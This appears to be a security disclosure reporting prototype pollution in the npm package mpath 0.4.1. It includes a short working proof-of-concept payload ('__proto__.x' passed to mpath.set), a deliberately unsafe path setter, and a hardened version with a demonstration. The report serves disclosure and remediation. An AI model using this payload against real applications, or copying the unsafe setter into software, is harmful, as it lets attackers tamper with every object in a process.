I would like to report a prototype pollution vulnerability in mpath.
It allows an attacker to inject arbitrary properties onto Object.prototype, which every plain object in the process then inherits.
module name: mpath
version: 0.4.1
npm page: https://www.npmjs.com/package/mpath
package description: {G,S}et javascript object values using MongoDB-like path notation
305,874 downloads in the last week
An attacker who controls the path string passed to mpath.set() can include a segment that resolves to the prototype object (for example __proto__), so the write lands on Object.prototype instead of on the target object. This lets the attacker overwrite important properties shared by every object or add new ones.
var mpath = require("mpath");

// Any object will do; the path below never touches obj's own properties.
var obj = {
  comments: [
    { title: 'funny' },
    { title: 'exciting!' }
  ]
};

// The first segment resolves to Object.prototype, so the write lands there.
mpath.set('__proto__.x', ['hilarious', 'fruity'], obj);

// An unrelated, freshly created object now inherits the injected value.
console.log({}.x);
supporting material: N/A
remediation: validate property names before writing to them and refuse to write through certain path segments. At minimum __proto__ must be rejected; constructor and prototype should be rejected as well, since a path such as constructor.prototype.x reaches Object.prototype by the same mechanism.
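The remediation above, worked through as an added example that is not mpath's code and not part of the original report: a minimal MongoDB-style dotted-path setter in the unsafe shape the proof of concept exploits, beside a hardened version that rejects prototype-reaching segments before walking the path. The names unsafeSet, safeSet, isForbiddenSegment, FORBIDDEN and demonstrate, and the sample document, are assumptions of this example; real mpath.set also maps values across arrays, which this stand-in deliberately omits.

```javascript
// Added example (not mpath's code): a minimal MongoDB-style dotted-path setter
// in the unsafe shape the report exploits, beside a hardened version.
// unsafeSet, safeSet, isForbiddenSegment, FORBIDDEN and demonstrate are names
// chosen for this example, not identifiers from mpath.

// Segments that let a path walk out of the target object into the prototype chain.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);

function isForbiddenSegment(seg) {
  return FORBIDDEN.has(seg);
}

// Unsafe: follows every segment through normal property lookup, so
// '__proto__.x' resolves the first segment to Object.prototype and writes there.
function unsafeSet(path, val, obj) {
  const parts = path.split('.');
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    if (cur[parts[i]] == null) cur[parts[i]] = {};
    cur = cur[parts[i]];
  }
  cur[parts[parts.length - 1]] = val;
  return obj;
}

// Hardened: refuse the dangerous segments before touching the object, and only
// descend into own properties so an inherited value is never used as a container.
function safeSet(path, val, obj) {
  const parts = path.split('.');
  for (const seg of parts) {
    if (isForbiddenSegment(seg)) {
      throw new TypeError('refusing to write through "' + seg + '" in path "' + path + '"');
    }
  }
  let cur = obj;
  for (let i = 0; i < parts.length - 1; i++) {
    const seg = parts[i];
    const own = Object.prototype.hasOwnProperty.call(cur, seg);
    if (!own || typeof cur[seg] !== 'object' || cur[seg] === null) {
      cur[seg] = {};
    }
    cur = cur[seg];
  }
  cur[parts[parts.length - 1]] = val;
  return obj;
}

// Runs the report's payload against both setters and returns what happened.
function demonstrate() {
  const payload = ['hilarious', 'fruity'];
  const results = {};

  // 1. Unsafe setter: the write lands on Object.prototype, so an unrelated
  //    fresh object now inherits x.
  unsafeSet('__proto__.x', payload, { comments: [] });
  results.unsafePolluted = ({}).x === payload;
  delete Object.prototype.x; // undo the pollution for the rest of the run

  // 2. Hardened setter: the same path is rejected and nothing leaks.
  let rejected = false;
  try {
    safeSet('__proto__.x', payload, { comments: [] });
  } catch (e) {
    rejected = e instanceof TypeError;
  }
  results.safeRejected = rejected;
  results.safeStillClean = ({}).x === undefined;

  // 3. The constructor.prototype route is closed as well.
  let rejectedCtor = false;
  try {
    safeSet('constructor.prototype.x', payload, { comments: [] });
  } catch (e) {
    rejectedCtor = e instanceof TypeError;
  }
  results.ctorRouteRejected = rejectedCtor;

  // 4. A legitimate MongoDB-style path still works (constructed sample document).
  const doc = { comments: [{ title: 'funny' }, { title: 'exciting!' }] };
  safeSet('comments.1.title', 'thrilling', doc);
  results.legitimateWrite = doc.comments[1].title;

  return results;
}

console.log(demonstrate());
```

Rejecting the segment up front is the simplest fix; the own-property check is a second line of defence, so a segment that merely names an inherited property (toString, say) gets a fresh container on the target object instead of being followed into the prototype chain.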
This may be intended behaviour of the module, but if so it needs to be documented clearly. To properly assess the impact, one must also look at the module's consumers, such as mongoose, and check whether an attacker can realistically control the path argument there.